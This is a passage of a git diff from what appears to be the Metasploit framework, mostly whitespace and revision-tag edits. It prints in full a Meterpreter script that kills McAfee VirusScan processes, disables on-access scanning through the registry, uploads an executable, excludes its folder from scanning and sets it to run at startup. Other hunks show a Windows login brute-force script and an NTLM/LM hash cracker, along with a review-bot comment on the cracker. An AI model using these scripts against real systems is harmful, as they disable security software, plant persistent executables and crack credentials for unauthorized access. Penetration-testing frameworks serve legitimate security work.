- print_line "----------------------------------------------------------------------------------------------"
- print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it"
- print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)"
- print_line "----------------------------------------------------------------------------------------------"
- print_line(@@exec_opts.usage)
-end
-
-@path = ""
-@location = ""
-
-def upload(session,file,trgloc)
- if not ::File.exists?(file)
- raise "File to Upload does not exists!"
- else
- @location = session.fs.file.expand_path("%TEMP%")
- begin
- ext = file.scan(/\S*(.exe)/i)
- if ext.join == ".exe"
- fileontrgt = "#{@location}\\MS#{rand(100)}.exe"
- else
- fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}"
- end
- @path = fileontrgt
- print_status("Uploading #{file}....")
- session.fs.file.upload_file("#{fileontrgt}","#{file}")
- print_status("Uploaded as #{fileontrgt}")
- rescue ::Exception => e
- print_status("Error uploading file #{file}: #{e.class} #{e}")
- end
- end
- return fileontrgt
-end
-
-#parsing of Options
-file = ""
-helpcall = 0
-killonly = 0
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-e"
- file = val || ""
- when "-h"
- helpcall = 1
- when "-k"
- killonly = 1
- end
-
-}
-
-if killonly == 0
- if file == ""
- usage
- raise Rex::Script::Completed
- end
-end
-
-# Magic kill order :)
-avs = %W{
- shstat.exe
- engineserver.exe
- frameworkservice.exe
- naprdmgr.exe
- mctray.exe
- mfeann.exe
- vstskmgr.exe
- mcshield.exe
-}
-
-av = 0
-
-plist = client.sys.process.get_processes()
-plist.each do |x|
- if (avs.index(x['name'].downcase))
- av = av + 1
- end
-end
-
-
-if av > 6
- print_status("VirusScan Enterprise v8.7.0i+ is running...")
-else
- print_status("VirusScan Enterprise v8.7.0i+ is not running!")
- raise Rex::Script::Completed
-end
-
-target_pid = nil
-target ||= "mfevtps.exe"
-
-print_status("Migrating to #{target}...")
-
-# Get the target process pid
-target_pid = client.sys.process[target]
-
-if not target_pid
- print_error("Could not access the target process")
- raise Rex::Script::Completed
-end
-
-print_status("Migrating into process ID #{target_pid}")
-client.core.migrate(target_pid)
-
-target_pid = nil
-
-if killonly == 1
- avs.each do |x|
- # Get the target process pid
- target_pid = client.sys.process[x]
- print_status("Killing off #{x}...")
- client.sys.process.kill(target_pid)
- end
-else
- avs.each do |x|
- # Get the target process pid
- target_pid = client.sys.process[x]
- print_status("Killing off #{x}...")
- client.sys.process.kill(target_pid)
- end
-
- # Upload it
- exec = upload(session,file,"")
-
- # Initiailze vars
- key = nil
- value = nil
- data = nil
- type = nil
-
- # Mcafee registry key
- key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default'
-
- # Split the key into its parts
- root_key, base_key = client.sys.registry.splitkey(key)
-
- # Disable when writing to disk option
- value = "bScanIncoming"
- data = 0
- type = "REG_DWORD"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Disable when reading from disk option
- value = "bScanOutgoing"
- data = 0
- type = "REG_DWORD"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Disable detection of unwanted programs
- value = "ApplyNVP"
- data = 0
- type = "REG_DWORD"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Increase the number of excluded items
- value = "NumExcludeItems"
- data = 1
- type = "REG_DWORD"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Add executable to excluded item folder
- value = "ExcludedItem_0"
- data = "3|3|" + @location
- type = "REG_SZ"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Set registry to run executable at startup
- key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
- # Split the key into its parts
- root_key, base_key = client.sys.registry.splitkey(key)
- value = "MS"
- data = @path
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-end
-
-print_status("Finished!")
+# $Id$
+# $Revision$
+
+# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic
+# order which keeps VirusScan icon visible at system tray without disabled sign on it.
+# Additionally it lets you disable On Access Scanner from registry, upload your detectable
+# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run
+# registry key. (Requires administrator privilege. Tested on XP SP3)
+#
+# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes)
+#
+# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com
+
+session = client
+@@exec_opts = Rex::Parser::Arguments.new(
+ "-h" => [ false,"Help menu." ],
+ "-k" => [ false,"Only kills VirusScan processes"],
+ "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ]
+)
+
+################## function declaration Declarations ##################
+def usage()
+ print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com"
+ print_line "----------------------------------------------------------------------------------------------"
+ print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it"
+ print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)"
+ print_line "----------------------------------------------------------------------------------------------"
+ print_line(@@exec_opts.usage)
+end
+
+@path = ""
+@location = ""
+
+def upload(session,file,trgloc)
+ if not ::File.exists?(file)
+ raise "File to Upload does not exists!"
+ else
+ @location = session.fs.file.expand_path("%TEMP%")
+ begin
+ ext = file.scan(/\S*(.exe)/i)
+ if ext.join == ".exe"
+ fileontrgt = "#{@location}\\MS#{rand(100)}.exe"
+ else
+ fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}"
+ end
+ @path = fileontrgt
+ print_status("Uploading #{file}....")
+ session.fs.file.upload_file("#{fileontrgt}","#{file}")
+ print_status("Uploaded as #{fileontrgt}")
+ rescue ::Exception => e
+ print_status("Error uploading file #{file}: #{e.class} #{e}")
+ end
+ end
+ return fileontrgt
+end
+
+#parsing of Options
+file = ""
+helpcall = 0
+killonly = 0
+@@exec_opts.parse(args) { |opt, idx, val|
+ case opt
+ when "-e"
+ file = val || ""
+ when "-h"
+ helpcall = 1
+ when "-k"
+ killonly = 1
+ end
+
+}
+
+if killonly == 0
+ if file == ""
+ usage
+ raise Rex::Script::Completed
+ end
+end
+
+# Magic kill order :)
+avs = %W{
+ shstat.exe
+ engineserver.exe
+ frameworkservice.exe
+ naprdmgr.exe
+ mctray.exe
+ mfeann.exe
+ vstskmgr.exe
+ mcshield.exe
+}
+
+av = 0
+
+plist = client.sys.process.get_processes()
+plist.each do |x|
+ if (avs.index(x['name'].downcase))
+ av = av + 1
+ end
+end
+
+
+if av > 6
+ print_status("VirusScan Enterprise v8.7.0i+ is running...")
+else
+ print_status("VirusScan Enterprise v8.7.0i+ is not running!")
+ raise Rex::Script::Completed
+end
+
+target_pid = nil
+target ||= "mfevtps.exe"
+
+print_status("Migrating to #{target}...")
+
+# Get the target process pid
+target_pid = client.sys.process[target]
+
+if not target_pid
+ print_error("Could not access the target process")
+ raise Rex::Script::Completed
+end
+
+print_status("Migrating into process ID #{target_pid}")
+client.core.migrate(target_pid)
+
+target_pid = nil
+
+if killonly == 1
+ avs.each do |x|
+ # Get the target process pid
+ target_pid = client.sys.process[x]
+ print_status("Killing off #{x}...")
+ client.sys.process.kill(target_pid)
+ end
+else
+ avs.each do |x|
+ # Get the target process pid
+ target_pid = client.sys.process[x]
+ print_status("Killing off #{x}...")
+ client.sys.process.kill(target_pid)
+ end
+
+ # Upload it
+ exec = upload(session,file,"")
+
+ # Initiailze vars
+ key = nil
+ value = nil
+ data = nil
+ type = nil
+
+ # Mcafee registry key
+ key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default'
+
+ # Split the key into its parts
+ root_key, base_key = client.sys.registry.splitkey(key)
+
+ # Disable when writing to disk option
+ value = "bScanIncoming"
+ data = 0
+ type = "REG_DWORD"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Disable when reading from disk option
+ value = "bScanOutgoing"
+ data = 0
+ type = "REG_DWORD"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Disable detection of unwanted programs
+ value = "ApplyNVP"
+ data = 0
+ type = "REG_DWORD"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Increase the number of excluded items
+ value = "NumExcludeItems"
+ data = 1
+ type = "REG_DWORD"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Add executable to excluded item folder
+ value = "ExcludedItem_0"
+ data = "3|3|" + @location
+ type = "REG_SZ"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Set registry to run executable at startup
+ key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
+ # Split the key into its parts
+ root_key, base_key = client.sys.registry.splitkey(key)
+ value = "MS"
+ data = @path
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+end
+
+print_status("Finished!")
diff --git a/scripts/meterpreter/vnc.rb b/scripts/meterpreter/vnc.rb
index 010f1a4ab1..9e9795b937 100644
--- a/scripts/meterpreter/vnc.rb
+++ b/scripts/meterpreter/vnc.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script for obtaining a quick VNC session
diff --git a/scripts/meterpreter/webcam.rb b/scripts/meterpreter/webcam.rb
index e0637847dc..5111081670 100644
--- a/scripts/meterpreter/webcam.rb
+++ b/scripts/meterpreter/webcam.rb
@@ -2,7 +2,7 @@
# $Revision$
# Author: scriptjunkie
#
-# Simplify running webcam, whether grabbing a single frame or running
+# Simplify running webcam, whether grabbing a single frame or running
# a continous loop.
@client = client
@@ -66,7 +66,7 @@ begin
end
print_line("[*] Starting webcam #{index}: #{camlist[index - 1]}")
client.webcam.webcam_start(index)
-
+
#prepare output
if(gui)
sock = Rex::Socket::Udp.create(
diff --git a/scripts/meterpreter/win32-sshclient.rb b/scripts/meterpreter/win32-sshclient.rb
index 8b06684b38..1ce149edc3 100644
--- a/scripts/meterpreter/win32-sshclient.rb
+++ b/scripts/meterpreter/win32-sshclient.rb
@@ -1,6 +1,7 @@
# win32-sshclient.rb
#
# $Id$
+# $Revision$
#
# Meterpreter script to deploy & run the "plink" commandline ssh-client
# supports only MS-Windows-2k/XP/Vista Hosts
diff --git a/scripts/meterpreter/win32-sshserver.rb b/scripts/meterpreter/win32-sshserver.rb
index 12266ab497..902b85d893 100644
--- a/scripts/meterpreter/win32-sshserver.rb
+++ b/scripts/meterpreter/win32-sshserver.rb
@@ -1,6 +1,7 @@
# win32-sshserver.rb
#
# $Id$
+# $Revision$
#
# meterpreter-script to deploy + run OpenSSH
# on the target machine
diff --git a/scripts/meterpreter/winbf.rb b/scripts/meterpreter/winbf.rb
index 2ce1fe1328..3cc3ae5af3 100644
--- a/scripts/meterpreter/winbf.rb
+++ b/scripts/meterpreter/winbf.rb
@@ -4,12 +4,12 @@
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "\tHelp menu."],
- "-t" => [ true, "\tTarget IP Address"],
- "-p" => [ true, "\tPassword List"],
- "-cp" => [ false, "\tCheck Local Machine Password Policy"],
- "-L" => [ true, "\tUsername List to be brute forced"],
- "-l" => [ true, "\tLogin name to be brute forced"]
+ "-h" => [ false, "\tHelp menu."],
+ "-t" => [ true, "\tTarget IP Address"],
+ "-p" => [ true, "\tPassword List"],
+ "-cp" => [ false, "\tCheck Local Machine Password Policy"],
+ "-L" => [ true, "\tUsername List to be brute forced"],
+ "-l" => [ true, "\tLogin name to be brute forced"]
)
# Variables for Options
user = []
@@ -66,56 +66,56 @@ end
def passbf(session,passlist,target,user,opt,logfile)
print_status("Running Brute force attack against #{user}")
print_status("Successfull Username and Password pairs are being saved in #{logfile}")
- result = []
+ result = []
output = []
passfnd = 0
- a = []
+ a = []
i = 0
if opt == 1
if not ::File.exists?(user)
raise "Usernames List File does not exists!"
- else
- user = ::File.open(user, "r")
- end
+ else
+ user = ::File.open(user, "r")
+ end
end
# Go thru each user
user.each do |u|
# Go thru each line in the password file
while passfnd < 1
::File.open(passlist, "r").each_line do |line|
- begin
- print_status("Trying #{u.chomp} #{line.chomp}")
+ begin
+ print_status("Trying #{u.chomp} #{line.chomp}")
+
+ # Command for testing local login credentials
+ r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ output << d
+ end
+ r.channel.close
+ r.close
+
+ # Checks if password is found
+ result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/)
+ if result.length == 1
+ print_status("\tUser: #{u.chomp} pass: #{line.chomp} found")
+ file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}")
+ r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ output << d
+ end
+ output.clear
+ r.channel.close
+ r.close
+ passfnd = 1
+ break
+ end
+ rescue ::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
- # Command for testing local login credentials
- r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- output << d
- end
- r.channel.close
- r.close
-
- # Checks if password is found
- result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/)
- if result.length == 1
- print_status("\tUser: #{u.chomp} pass: #{line.chomp} found")
- file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}")
- r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- output << d
- end
- output.clear
- r.channel.close
- r.close
- passfnd = 1
- break
- end
- rescue ::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
- end
-
- end
- passfnd = 1
- end
+ end
+ passfnd = 1
+ end
passfnd = 0
end
end
@@ -152,33 +152,31 @@ unsupported if client.platform !~ /win32|win64/i
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
- when "-l"
- user << val
- ulopt = 0
- when "-L"
- userlist = val
- ulopt = 1
-
- when "-cp"
- chkpolicy(session)
- exit
- when "-p"
-
- passlist = val
- if not ::File.exists?(passlist)
- raise "Password File does not exists!"
- end
- when "-t"
- target = val
- when "-h"
- print(
- "Windows Login Brute Force Meterpreter Script\n" +
- "Usage:\n" +
- @@exec_opts.usage
- )
- helpcall = 1
- end
-
+ when "-l"
+ user << val
+ ulopt = 0
+ when "-L"
+ userlist = val
+ ulopt = 1
+
+ when "-cp"
+ chkpolicy(session)
+ exit
+ when "-p"
+
+ passlist = val
+ if not ::File.exists?(passlist)
+ raise "Password File does not exists!"
+ end
+ when "-t"
+ target = val
+ when "-h"
+ print("Windows Login Brute Force Meterpreter Script\n" +
+ "Usage:\n" +
+ @@exec_opts.usage)
+ helpcall = 1
+ end
+
}
# Execution of options selected
@@ -191,11 +189,9 @@ elsif userlist != nil && passlist != nil && target != nil
passbf(session,passlist,target,userlist,ulopt,logme(target))
elsif helpcall == 0
+ print("Windows Login Brute Force Meterpreter Script\n" +
+ "Usage:\n" +
+ @@exec_opts.usage)
- print(
- "Windows Login Brute Force Meterpreter Script\n" +
- "Usage:\n" +
- @@exec_opts.usage
- )
end
diff --git a/scripts/meterpreter/wmic.rb b/scripts/meterpreter/wmic.rb
index 8a1bd40653..b91b553545 100644
--- a/scripts/meterpreter/wmic.rb
+++ b/scripts/meterpreter/wmic.rb
@@ -28,7 +28,7 @@ def wmicexec(session,wmiccmds= nil)
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
wmiccmds.each do |wmi|
print_status "running command wmic #{wmi}"
- puts wmicfl
+ print_line wmicfl
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finishes before executing next wmic command
@@ -77,7 +77,7 @@ end
def usage
print_line("Windows WMIC Command Execution Meterpreter Script ")
- puts @@exec_opts.usage
+ print_line @@exec_opts.usage
print_line("USAGE:")
print_line("run wmic -c \"WMIC Command Argument\"\n")
print_line("NOTE:")
diff --git a/scripts/shell/migrate.rb b/scripts/shell/migrate.rb
index 1dd96c9e15..327fef8a3a 100644
--- a/scripts/shell/migrate.rb
+++ b/scripts/shell/migrate.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Simply print a message that migrating is not supported on CommandShell sessions...
#
diff --git a/scripts/shell/spawn_meterpreter.rb b/scripts/shell/spawn_meterpreter.rb
index 672e8adc50..e6fa404769 100644
--- a/scripts/shell/spawn_meterpreter.rb
+++ b/scripts/shell/spawn_meterpreter.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Spawn a meterpreter session using an existing command shell session
#
diff --git a/tools/import_webscarab.rb b/tools/import_webscarab.rb
index 10b0bff8f5..9a8ab88c49 100755
--- a/tools/import_webscarab.rb
+++ b/tools/import_webscarab.rb
@@ -52,7 +52,8 @@ puts("Opening database file: #{db_file}")
database = SQLite3::Database.new(db_file)
# Prepare the insert statement...
-insert_statement = database.prepare("INSERT INTO requests(host,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created) VALUES(:host,:port,:ssl,:meth,:path,:headers,:query,:body,:respcode,:resphead,:response,:created)");
+insert_statement = database.prepare("INSERT INTO requests(host,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created)" +
+ " VALUES(:host,:port,:ssl,:meth,:path,:headers,:query,:body,:respcode,:resphead,:response,:created)");
# target hash -> Resolving dns names is soooo slow, I don't know why. So we use the
# following hash as a "micro hosts", so we don't have to call getaddress each time...
diff --git a/tools/list_interfaces.rb b/tools/list_interfaces.rb
index 5a59f45beb..bc649e192c 100755
--- a/tools/list_interfaces.rb
+++ b/tools/list_interfaces.rb
@@ -1,9 +1,9 @@
#!/usr/bin/env ruby
#
-# $Id:$
-# $Revision:$
+# $Id$
+# $Revision$
#
-# This small utility will display all the informations about the network interfaces
+# This small utility will display all the informations about the network interfaces
# that one can use under Windows with modules using pcaprub and having the INTERFACE option (ex: arp_poisonning, arp_sweep, ...).
# To use th interface option under Windows use the Index value displayed by this tool (ex: "SET INTERFACE 1")
#
@@ -19,14 +19,14 @@ if RUBY_PLATFORM == "i386-mingw32"
Pcap.respond_to?(:interfaces) and
Pcap.respond_to?(:addresses))
$stderr.puts "Error: Looks like you are not running the latest version of pcaprub"
- exit
+ exit
end
found = false
Pcap.interfaces.each_with_index do |iface, i|
found = true
detail = Pcap.interface_info(iface)
addr = Pcap.addresses(iface)
- puts "#" * 70
+ puts "#" * 70
puts ""
puts "INDEX : " + (i + 1).to_s
puts "NAME : " + detail["name"]
diff --git a/tools/lm2ntcrack.rb b/tools/lm2ntcrack.rb
index eba6063b9e..9ff9bdebb3 100755
--- a/tools/lm2ntcrack.rb
+++ b/tools/lm2ntcrack.rb
@@ -68,7 +68,7 @@ $args.parse(ARGV) { |opt, idx, val|
end
}
-if not type
+if not type
usage
else
if pass and (not (hash or list))
@@ -77,20 +77,20 @@ else
mode = PASS_MODE
elsif list and hash and not pass
mode = BRUTE_MODE
- if not File.exist? list
- $stderr.puts "[*] The passwords list file does not exist"
+ if not File.exist? list
+ $stderr.puts "[*] The passwords list file does not exist"
exit
end
- if not File.file? list
- $stderr.puts "[*] The passwords list provided is not a file"
+ if not File.file? list
+ $stderr.puts "[*] The passwords list provided is not a file"
exit
end
- if not File.readable? list
- $stderr.puts "[*] The passwords list file is not readable"
+ if not File.readable? list
+ $stderr.puts "[*] The passwords list file is not readable"
exit
end
else
- usage
+ usage
end
end
@@ -112,8 +112,8 @@ elsif type == "NETNTLM2_SESSION" then
end
end
-case type
-when "HALFLM"
+case type
+when "HALFLM"
case mode
when BRUTE_MODE
if not hash =~ /^([a-fA-F0-9]{16})$/
@@ -122,18 +122,18 @@ when "HALFLM"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
- if password =~ /^.{1,7}$/
+ if password =~ /^.{1,7}$/
puts password
- calculatedhash = CRYPT::lm_hash(password,true).unpack("H*")[0].upcase
+ calculatedhash = CRYPT::lm_hash(password,true).unpack("H*")[0].upcase
if calculatedhash == hash.upcase
found = true
match_password = password
break
end
- end
+ end
end
end
if found
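Review bot: Style: each candidate is normalized with `line.gsub("\r\n",'').gsub("\n",'')`, but `each_line` only ever leaves a trailing line ending, so `password = line.chomp` expresses the intent directly and handles both `\r\n` and `\n`. The loop also `puts` every candidate before hashing it, which floods stdout and will dominate run time on a large wordlist; consider dropping it or gating it behind a verbose flag. Opening the list with `"rb"` now yields ASCII-8BIT strings, which is presumably what `CRYPT::lm_hash` wants for the OEM/upcase step, but it is worth confirming that helper does not expect UTF-8 input.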
@@ -170,7 +170,7 @@ when "HALFLM"
end
end
-when "LM"
+when "LM"
case mode
when BRUTE_MODE
if not hash =~ /^([a-fA-F0-9]{32})$/
@@ -179,7 +179,7 @@ when "LM"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
if password =~ /^.{1,14}$/
@@ -190,7 +190,7 @@ when "LM"
match_password = password
break
end
- end
+ end
end
end
if found
@@ -236,7 +236,7 @@ when "NTLM"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
@@ -245,7 +245,7 @@ when "NTLM"
found = true
match_password = password
break
- end
+ end
end
end
if found
@@ -290,7 +290,7 @@ when "HALFNETLMv1"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
if password =~ /^.{1,7}$/
@@ -304,7 +304,7 @@ when "HALFNETLMv1"
match_password = password
break
end
- end
+ end
end
end
if found
@@ -380,7 +380,7 @@ when "NETLMv1"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
if password =~ /^.{1,14}$/
@@ -392,7 +392,7 @@ when "NETLMv1"
found = true
match_password = password
break
- end
+ end
end
end
end
@@ -404,7 +404,7 @@ when "NETLMv1"
exit
end
when HASH_MODE
- if not pass =~ /^.{1,14}$/
+ if not pass =~ /^.{1,14}$/
$stderr.puts "[*] NETLMv1 password can not be bigger then 14 characters"
exit
end
@@ -423,7 +423,7 @@ when "NETLMv1"
puts "[*] The NETLMv1 hash for #{pass.upcase} is : #{calculatedhash}"
exit
when PASS_MODE
- if not pass =~ /^.{1,14}$/
+ if not pass =~ /^.{1,14}$/
$stderr.puts "[*] NETLMv1 password can not be bigger then 14 characters"
exit
end
@@ -468,18 +468,18 @@ when "NETNTLMv1"
end
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password),
:challenge => [ srvchal ].pack("H*") }
calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase
if calculatedhash == hash.upcase
found = true
match_password = password
break
- end
+ end
end
end
if found
@@ -498,7 +498,7 @@ when "NETNTLMv1"
$stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal"
exit
end
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
:challenge => [ srvchal ].pack("H*") }
calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase
puts "[*] The NETNTLMv1 hash for #{pass} is : #{calculatedhash}"
@@ -516,7 +516,7 @@ when "NETNTLMv1"
$stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal"
exit
end
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
:challenge => [ srvchal ].pack("H*") }
calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase
@@ -554,21 +554,21 @@ when "NETNTLM2_SESSION"
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password),
:challenge => [ srvchal ].pack("H*") }
optntlm = { :client_challenge => [ clichal ].pack("H*")}
calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase
-
+
if calculatedhash == hash.upcase
found = true
match_password = password
break
- end
+ end
end
end
if found
@@ -595,7 +595,7 @@ when "NETNTLM2_SESSION"
$stderr.puts "[*] Client challenge must be exactly 16 bytes of hexadecimal"
exit
end
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
:challenge => [ srvchal ].pack("H*") }
optntlm = { :client_challenge => [ clichal ].pack("H*")}
@@ -623,7 +623,7 @@ when "NETNTLM2_SESSION"
$stderr.puts "[*] Client challenge must be exactly 16 bytes of hexadecimal"
exit
end
- argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
+ argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass),
:challenge => [ srvchal ].pack("H*") }
optntlm = { :client_challenge => [ clichal ].pack("H*")}
@@ -671,7 +671,7 @@ when "NETLMv2"
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
@@ -683,7 +683,7 @@ when "NETLMv2"
found = true
match_password = password
break
- end
+ end
end
end
if found
@@ -802,7 +802,7 @@ when "NETNTLMv2"
found = false
match_password = nil
- File.open(list,"r") do |password_list|
+ File.open(list,"rb") do |password_list|
password_list.each_line do |line|
password = line.gsub("\r\n",'').gsub("\n",'')
puts password
@@ -815,7 +815,7 @@ when "NETNTLMv2"
found = true
match_password = password
break
- end
+ end
end
end
if found
diff --git a/tools/vxdigger.rb b/tools/vxdigger.rb
index 99e2df9b53..f5784a8092 100755
--- a/tools/vxdigger.rb
+++ b/tools/vxdigger.rb
@@ -9,6 +9,8 @@
#
# (C) 2010 Rapid7
#
+# $Revision$
+#
def usage
$stderr.puts "usage: #{$0} [dump-file] "
diff --git a/tools/vxencrypt.rb b/tools/vxencrypt.rb
index dcb2bc8b77..7c8d7d3924 100755
--- a/tools/vxencrypt.rb
+++ b/tools/vxencrypt.rb
@@ -2,8 +2,8 @@
#
# This script can be used to calculate hash values for VxWorks passwords.
#
-
-
+# $Revision$
+#
def hashit(inp)
if inp.length < 8 or inp.length > 120
diff --git a/tools/vxmaster.rb b/tools/vxmaster.rb
index af6014b250..396f567dd8 100755
--- a/tools/vxmaster.rb
+++ b/tools/vxmaster.rb
@@ -9,6 +9,8 @@
#
# (C) 2010 Rapid7
#
+# $Revision$
+#
# VxWorks converts the clear-text password into single integer value. This value